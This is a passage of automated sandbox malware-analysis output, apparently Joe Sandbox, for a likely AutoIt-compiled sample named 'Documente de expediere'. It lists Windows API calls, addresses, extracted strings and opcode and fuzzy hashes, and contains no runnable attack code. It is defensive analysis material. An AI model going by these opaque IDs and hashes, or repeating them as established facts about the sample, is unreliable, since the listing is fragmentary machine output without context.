                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: 7dc2e5c038cbe5be7bb673a108f0268233cc9b13e8bf78ccdcf855f8b796c63a
                                                • Instruction ID: e32b1081c513149846e5f3004647a514a53f63cc0ea0bc6e3a7e95c671db0a27
                                                • Opcode Fuzzy Hash: 7dc2e5c038cbe5be7bb673a108f0268233cc9b13e8bf78ccdcf855f8b796c63a
                                                • Instruction Fuzzy Hash: 79917F742043019FCF54EF28C451AAEB7A6AF54314F14846CF8965B7E2CB38ED8ACB95
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0071BB6E
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00719431), ref: 0071BBCA
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071BC03
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0071BC46
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071BC7D
                                                • FreeLibrary.KERNEL32(?), ref: 0071BC89
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0071BC99
                                                • DestroyIcon.USER32(?,?,?,?,?,00719431), ref: 0071BCA8
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0071BCC5
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0071BCD1
                                                  • Part of subcall function 006B313D: __wcsicmp_l.LIBCMT ref: 006B31C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 1212759294-1154884017
                                                • Opcode ID: a218642eaf4845ed76fc5e0529e9d273709e00430070bf1c630996f3ca2be888
                                                • Instruction ID: cfaffd941a43bca8babcc7677dcc27953b76563ac74d4b7101032a8b6141117c
                                                • Opcode Fuzzy Hash: a218642eaf4845ed76fc5e0529e9d273709e00430070bf1c630996f3ca2be888
                                                • Instruction Fuzzy Hash: C761A0B1600619BAEB24DF69CC85FFE77ACFB08710F108219F915D61D0DB789990DBA0
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,0071FB78), ref: 006FA0FC
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 006FA11E
                                                • __swprintf.LIBCMT ref: 006FA177
                                                • __swprintf.LIBCMT ref: 006FA190
                                                • _wprintf.LIBCMT ref: 006FA246
                                                • _wprintf.LIBCMT ref: 006FA264
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%r
                                                • API String ID: 311963372-3687378605
                                                • Opcode ID: 7f7e45f883cfb6a0b02272c416b0e48cc708a31885785c9fb3a11abb1dfec14b
                                                • Instruction ID: ad43053e72bc830bdae87d7bf89304c546a81e48bf1c1b82285a3f6dc19415a6
                                                • Opcode Fuzzy Hash: 7f7e45f883cfb6a0b02272c416b0e48cc708a31885785c9fb3a11abb1dfec14b
                                                • Instruction Fuzzy Hash: 4851BFB2904209BBCF55EBE0CD82EEEB77AAF04300F144169F505721A1EB356F48DB69
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • CharLowerBuffW.USER32(?,?), ref: 006FA636
                                                • GetDriveTypeW.KERNEL32 ref: 006FA683
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA6CB
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA702
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA730
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 8b740996d6e9844084cf7df570287bffd71cb41bc32b5d88ca56e10fd6e1bd72
                                                • Instruction ID: fe2991006d135a7366c6812f835a4c33d68d4e9327baf68273b16832b6cf9736
                                                • Opcode Fuzzy Hash: 8b740996d6e9844084cf7df570287bffd71cb41bc32b5d88ca56e10fd6e1bd72
                                                • Instruction Fuzzy Hash: 63515FB51143059FCB40EF14C88186AB7FAFF84718F04896CF89A576A1DB35EE0ACB56
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006FA47A
                                                • __swprintf.LIBCMT ref: 006FA49C
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 006FA4D9
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006FA4FE
                                                • _memset.LIBCMT ref: 006FA51D
                                                • _wcsncpy.LIBCMT ref: 006FA559
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006FA58E
                                                • CloseHandle.KERNEL32(00000000), ref: 006FA599
                                                • RemoveDirectoryW.KERNEL32(?), ref: 006FA5A2
                                                • CloseHandle.KERNEL32(00000000), ref: 006FA5AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: fd51ff696b1445ff6ddeffff9b7234993a8b46ce2c3edc247f9d991878ff16ed
                                                • Instruction ID: c92034bc6b9f856eac8fd9b0348c8340d2877f594daacd11039482cecd1011ec
                                                • Opcode Fuzzy Hash: fd51ff696b1445ff6ddeffff9b7234993a8b46ce2c3edc247f9d991878ff16ed
                                                • Instruction Fuzzy Hash: A83191B1500119AADB21DFA4DC48FFB77BDEF88701F1081BAF608D6160E67496448B29
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 006FDC7B
                                                • _wcscat.LIBCMT ref: 006FDC93
                                                • _wcscat.LIBCMT ref: 006FDCA5
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006FDCBA
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FDCCE
                                                • GetFileAttributesW.KERNEL32(?), ref: 006FDCE6
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 006FDD00
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FDD12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                • String ID: *.*
                                                • API String ID: 34673085-438819550
                                                • Opcode ID: 54e490afdbb89d5d62789d9a9dffb690bd053750fc6c9cd2bd2a0ce14821bdac
                                                • Instruction ID: 2bd8018be41b81706e963b8d505ab59a143b2e0267387b5d1d9fd002fb56ab4a
                                                • Opcode Fuzzy Hash: 54e490afdbb89d5d62789d9a9dffb690bd053750fc6c9cd2bd2a0ce14821bdac
                                                • Instruction Fuzzy Hash: 7281A2B15042099FCB60EF64C8459BEB7EBBF89350F19882EF989C7350E630E945CB52
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0071C4EC
                                                • GetFocus.USER32 ref: 0071C4FC
                                                • GetDlgCtrlID.USER32(00000000), ref: 0071C507
                                                • _memset.LIBCMT ref: 0071C632
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0071C65D
                                                • GetMenuItemCount.USER32(?), ref: 0071C67D
                                                • GetMenuItemID.USER32(?,00000000), ref: 0071C690
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0071C6C4
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0071C70C
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0071C744
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0071C779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 2f516f20ea260aadaa9b8897d1ac8463c8d0195fffdd0bfcd0dc9fa74277a71c
                                                • Instruction ID: f220f5fc7d1396b6a053a0b79ea23040d8282a5c5b95cc6abb747fde24d151a2
                                                • Opcode Fuzzy Hash: 2f516f20ea260aadaa9b8897d1ac8463c8d0195fffdd0bfcd0dc9fa74277a71c
                                                • Instruction Fuzzy Hash: 6981BD70248301AFD711CF58C885AEBBBE9FB88314F10492DF995972D1D778E985CBA2
                                                APIs
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E8766
                                                  • Part of subcall function 006E874A: GetLastError.KERNEL32(?,006E822A,?,?,?), ref: 006E8770
                                                  • Part of subcall function 006E874A: GetProcessHeap.KERNEL32(00000008,?,?,006E822A,?,?,?), ref: 006E877F
                                                  • Part of subcall function 006E874A: HeapAlloc.KERNEL32(00000000,?,006E822A,?,?,?), ref: 006E8786
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E879D
                                                  • Part of subcall function 006E87E7: GetProcessHeap.KERNEL32(00000008,006E8240,00000000,00000000,?,006E8240,?), ref: 006E87F3
                                                  • Part of subcall function 006E87E7: HeapAlloc.KERNEL32(00000000,?,006E8240,?), ref: 006E87FA
                                                  • Part of subcall function 006E87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006E8240,?), ref: 006E880B
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E8458
                                                • _memset.LIBCMT ref: 006E846D
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E848C
                                                • GetLengthSid.ADVAPI32(?), ref: 006E849D
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 006E84DA
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E84F6
                                                • GetLengthSid.ADVAPI32(?), ref: 006E8513
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006E8522
                                                • HeapAlloc.KERNEL32(00000000), ref: 006E8529
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E854A
                                                • CopySid.ADVAPI32(00000000), ref: 006E8551
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E8582
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E85A8
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E85BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: db54e465e76a3f01fe674ae6802f7ce63aa4435b0ec6c17bbb77f24d2121416e
                                                • Instruction ID: 0b17c7a5704bfc327aa0c36641ff5c49dbf46fa074a1a2ba48b162cccbc92f9e
                                                • Opcode Fuzzy Hash: db54e465e76a3f01fe674ae6802f7ce63aa4435b0ec6c17bbb77f24d2121416e
                                                • Instruction Fuzzy Hash: 07613971901249AFDF00DFA5DC45AEEBBBAFF04300F148269F819AB291DB359A05CF64
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007076A2
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007076AE
                                                • CreateCompatibleDC.GDI32(?), ref: 007076BA
                                                • SelectObject.GDI32(00000000,?), ref: 007076C7
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0070771B
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00707757
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0070777B
                                                • SelectObject.GDI32(00000006,?), ref: 00707783
                                                • DeleteObject.GDI32(?), ref: 0070778C
                                                • DeleteDC.GDI32(00000006), ref: 00707793
                                                • ReleaseDC.USER32(00000000,?), ref: 0070779E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: a072deeb221f004e5c939af918d78ab3c751566b9799548a73599798fb7ebfdf
                                                • Instruction ID: 61813494ceb71530d52039c5f9749c0bb1660b65554d7953f5ceecf4499364fc
                                                • Opcode Fuzzy Hash: a072deeb221f004e5c939af918d78ab3c751566b9799548a73599798fb7ebfdf
                                                • Instruction Fuzzy Hash: C0513875904209EFCB15CFA8CC84EAEBBF9EF48310F14C52DF94AA7291D635A940CB64
                                                APIs
                                                  • Part of subcall function 006B0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00696C6C,?,00008000), ref: 006B0BB7
                                                  • Part of subcall function 006948AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006948A1,?,?,006937C0,?), ref: 006948CE
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696D0D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00696E5A
                                                  • Part of subcall function 006959CD: _wcscpy.LIBCMT ref: 00695A05
                                                  • Part of subcall function 006B387D: _iswctype.LIBCMT ref: 006B3885
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-1018226102
                                                • Opcode ID: 40a84bc427d03a215c910216bc219d6ef3f7730d4cdb5a806eebb7227ea4b3b1
                                                • Instruction ID: 87f0ef3829b4bb2e2e50c251f582dc48869d4bbd469637986867cd4ab7540bd0
                                                • Opcode Fuzzy Hash: 40a84bc427d03a215c910216bc219d6ef3f7730d4cdb5a806eebb7227ea4b3b1
                                                • Instruction Fuzzy Hash: B9029B701083419FCB64EF24C881AAFBBEAEF98314F14491DF48A976A1DB31D949CB46
                                                APIs
                                                • _memset.LIBCMT ref: 006945F9
                                                • GetMenuItemCount.USER32(00756890), ref: 006CD7CD
                                                • GetMenuItemCount.USER32(00756890), ref: 006CD87D
                                                • GetCursorPos.USER32(?), ref: 006CD8C1
                                                • SetForegroundWindow.USER32(00000000), ref: 006CD8CA
                                                • TrackPopupMenuEx.USER32(00756890,00000000,?,00000000,00000000,00000000), ref: 006CD8DD
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006CD8E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 2751501086-0
                                                • Opcode ID: 59d637d31a5c26f9fe2ff1c4a3aa949df286c724b083d1be37ba6342ae5a7f01
                                                • Instruction ID: 02e1f0a9b961ff5fbbb59c5e866d76f76332405cfc3ecb2b155d435d9d48ac2a
                                                • Opcode Fuzzy Hash: 59d637d31a5c26f9fe2ff1c4a3aa949df286c724b083d1be37ba6342ae5a7f01
                                                • Instruction Fuzzy Hash: 1D71D670601205BFEB219F14DC45FFABF6AFF05364F10422AF514A62D1CBB55861DBA4
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00708BEC
                                                • CoInitialize.OLE32(00000000), ref: 00708C19
                                                • CoUninitialize.OLE32 ref: 00708C23
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00708D23
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00708E50
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00722C0C), ref: 00708E84
                                                • CoGetObject.OLE32(?,00000000,00722C0C,?), ref: 00708EA7
                                                • SetErrorMode.KERNEL32(00000000), ref: 00708EBA
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00708F3A
                                                • VariantClear.OLEAUT32(?), ref: 00708F4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID: ,,r
                                                • API String ID: 2395222682-1227627816
                                                • Opcode ID: ee784f2870b85f42270fd8b350a7ccb5468d93b304aeacbe2e6e1f117db717f8
                                                • Instruction ID: a3f58be70a6e33a7616a531978f75dedc7d244f7b46aae4065fa18e43f1fbf76
                                                • Opcode Fuzzy Hash: ee784f2870b85f42270fd8b350a7ccb5468d93b304aeacbe2e6e1f117db717f8
                                                • Instruction Fuzzy Hash: 7EC123B1208305EFD740DF68C88496BB7E9BF88748F004A6DF5899B291DB75ED05CB62
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: 96a988453326c40ae821e428337fb430065e73ca1ad43545c06470272b051079
                                                • Instruction ID: 304b2e5dfd845bd8cd9bff889bb009adf02dc8ff55b1d729926310ce3bc317b9
                                                • Opcode Fuzzy Hash: 96a988453326c40ae821e428337fb430065e73ca1ad43545c06470272b051079
                                                • Instruction Fuzzy Hash: 2B41507021024E9BDF10EF98DC91AEB3725BF15300F908468ED915B2D1D778ED9ACB54
                                                APIs
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                  • Part of subcall function 00697A84: _memmove.LIBCMT ref: 00697B0D
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006F55D2
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006F55E8
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006F55F9
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006F560B
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006F561C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: 5ac81ac0b7534df902b5986a6fde0c0981507b2d72d95f4b0ad46feeb0c49412
                                                • Instruction ID: 932ced228a12ec322f48e3a472b7e9923801b6d70bcbd0f9abcc3bf47bda6432
                                                • Opcode Fuzzy Hash: 5ac81ac0b7534df902b5986a6fde0c0981507b2d72d95f4b0ad46feeb0c49412
                                                • Instruction Fuzzy Hash: E41194715A016D79DB20BB65CC4ADFF7B7DEF91F00F400469B511A20E1EF641D05C5A5
                                                APIs
                                                Strings
                                                Memory Dump Source
